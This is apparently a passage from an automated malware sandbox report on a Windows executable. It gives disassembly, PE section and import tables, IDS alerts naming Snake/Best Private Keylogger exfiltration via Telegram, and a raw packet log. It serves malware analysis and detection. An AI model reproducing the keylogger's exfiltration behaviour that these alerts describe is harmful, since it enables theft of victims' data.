                                                                                                          mov dword ptr [esp+10h], 0040A230h
                                                                                                          mov dword ptr [esp+1Ch], ebx
                                                                                                          call dword ptr [004080ACh]
                                                                                                          call dword ptr [004080A8h]
                                                                                                          and eax, BFFFFFFFh
                                                                                                          cmp ax, 00000006h
                                                                                                          mov dword ptr [0042A24Ch], eax
                                                                                                          je 00007F1A08C4D173h
                                                                                                          push ebx
                                                                                                          call 00007F1A08C5043Dh
                                                                                                          cmp eax, ebx
                                                                                                          je 00007F1A08C4D169h
                                                                                                          push 00000C00h
                                                                                                          call eax
                                                                                                          mov esi, 004082B0h
                                                                                                          push esi
                                                                                                          call 00007F1A08C503B7h
                                                                                                          push esi
                                                                                                          call dword ptr [00408150h]
                                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                                          cmp byte ptr [esi], 00000000h
                                                                                                          jne 00007F1A08C4D14Ch
                                                                                                          push 0000000Ah
                                                                                                          call 00007F1A08C50410h
                                                                                                          push 00000008h
                                                                                                          call 00007F1A08C50409h
                                                                                                          push 00000006h
                                                                                                          mov dword ptr [0042A244h], eax
                                                                                                          call 00007F1A08C503FDh
                                                                                                          cmp eax, ebx
                                                                                                          je 00007F1A08C4D171h
                                                                                                          push 0000001Eh
                                                                                                          call eax
                                                                                                          test eax, eax
                                                                                                          je 00007F1A08C4D169h
                                                                                                          or byte ptr [0042A24Fh], 00000040h
                                                                                                          push ebp
                                                                                                          call dword ptr [00408044h]
                                                                                                          push ebx
                                                                                                          call dword ptr [004082A0h]
                                                                                                          mov dword ptr [0042A318h], eax
                                                                                                          push ebx
                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                          push 000002B4h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          push 004216E8h
                                                                                                          call dword ptr [00408188h]
                                                                                                          push 0040A384h
                                                                                                          Programming Language:
                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                          RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                          RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                          RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                          RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                          RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                          RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                          RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                          RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                          RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                          RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                          RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                          RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                          RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                          RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                          RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                          RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                          RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                          RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                          RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                          RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                          RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                          DLLImport
                                                                                                          KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                          USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                          ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-11T07:31:46.466321+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449855142.250.186.142443TCP
                                                                                                          2025-01-11T07:31:52.684100+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449892193.122.6.16880TCP
                                                                                                          2025-01-11T07:32:02.309183+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449892193.122.6.16880TCP
                                                                                                          2025-01-11T07:32:03.115558+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449968149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:03.547442+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449968149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:04.387334+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449978193.122.6.16880TCP
                                                                                                          2025-01-11T07:32:04.967289+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449983149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:05.375843+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449983149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:06.084703+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449991193.122.6.16880TCP
                                                                                                          2025-01-11T07:32:06.709751+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449996149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:07.002723+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449996149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:08.250052+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.450007149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:08.524808+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.450007149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:11.034010+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.450016149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:11.383091+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.450016149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:12.632554+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.450018149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:12.919988+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.450018149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:15.961929+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.450020149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:16.351728+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.450020149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:17.696802+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.450022149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:17.916819+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.450022149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:20.994975+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.450024149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:21.217034+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.450024149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:23.891363+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.450026149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:24.193404+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.450026149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:26.669545+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.450028149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:27.018151+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.450028149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:28.844046+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.450030149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:29.166698+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.450030149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:33.255971+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.450032149.154.167.220443TCP
                                                                                                          2025-01-11T07:32:33.677129+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.450032149.154.167.220443TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 11, 2025 07:31:45.370661020 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:45.370703936 CET44349855142.250.186.142192.168.2.4
                                                                                                          Jan 11, 2025 07:31:45.370794058 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:45.388998032 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:45.389023066 CET44349855142.250.186.142192.168.2.4
                                                                                                          Jan 11, 2025 07:31:46.060664892 CET44349855142.250.186.142192.168.2.4
                                                                                                          Jan 11, 2025 07:31:46.060785055 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:46.061832905 CET44349855142.250.186.142192.168.2.4
                                                                                                          Jan 11, 2025 07:31:46.061888933 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:46.166954041 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:46.166970015 CET44349855142.250.186.142192.168.2.4
                                                                                                          Jan 11, 2025 07:31:46.167442083 CET44349855142.250.186.142192.168.2.4
                                                                                                          Jan 11, 2025 07:31:46.167496920 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:46.172029972 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:46.219321966 CET44349855142.250.186.142192.168.2.4
                                                                                                          Jan 11, 2025 07:31:46.466254950 CET44349855142.250.186.142192.168.2.4
                                                                                                          Jan 11, 2025 07:31:46.466517925 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:46.466536999 CET44349855142.250.186.142192.168.2.4
                                                                                                          Jan 11, 2025 07:31:46.466583967 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:46.466799974 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:46.466845989 CET44349855142.250.186.142192.168.2.4
                                                                                                          Jan 11, 2025 07:31:46.466895103 CET49855443192.168.2.4142.250.186.142
                                                                                                          Jan 11, 2025 07:31:46.492896080 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:46.492949009 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:46.493027925 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:46.493392944 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:46.493413925 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:47.128484011 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:47.128552914 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:47.133858919 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:47.133869886 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:47.134213924 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:47.134268045 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:47.134737015 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:47.179325104 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.201756954 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.201919079 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.207607031 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.207699060 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.220195055 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.220273972 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.220283985 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.220333099 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.226500034 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.226555109 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.288171053 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.288225889 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.288281918 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.288295031 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.288342953 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.291076899 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.292200089 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.292205095 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.292238951 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.297229052 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.297274113 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.297384024 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.297418118 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.303586006 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.303976059 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.303982019 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.304083109 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.309865952 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.309940100 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.309946060 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.309981108 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.316174030 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.316366911 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.316371918 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.316435099 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.322542906 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.322762012 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.322767019 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.322824955 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.328985929 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.329029083 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.329061985 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.329097986 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.334733963 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.334788084 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.334795952 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.334835052 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.340667009 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.340717077 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.340723038 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.340763092 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.346241951 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.346297979 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.346307993 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.346345901 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.352099895 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.352153063 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.356801033 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.356858969 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.357871056 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.357916117 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.374881029 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.374949932 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.374959946 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.374996901 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.375061035 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.375101089 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.375104904 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.375144958 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.375149012 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.375190973 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.377342939 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.377397060 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.377778053 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.377821922 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.383191109 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.383240938 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.383269072 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.383277893 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.383308887 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.383327007 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.388756990 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.388839006 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.388844967 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.388884068 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.394090891 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.394260883 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.394268990 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.394314051 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.399110079 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.399169922 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.399175882 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.399210930 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.404035091 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.404169083 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.404174089 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.404222965 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.408673048 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.408736944 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.408740997 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.408776045 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.413467884 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.413526058 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.413531065 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.413564920 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.418086052 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.418143988 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.418152094 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.418190002 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.422693968 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.422750950 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.422760010 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.422792912 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.427448034 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.427510023 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.427522898 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.427553892 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.432007074 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.432080030 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.432094097 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.432147026 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.432153940 CET49866443192.168.2.4142.250.185.129
                                                                                                          Jan 11, 2025 07:31:50.436403036 CET44349866142.250.185.129192.168.2.4
                                                                                                          Jan 11, 2025 07:31:50.436512947 CET49866443192.168.2.4142.250.185.129
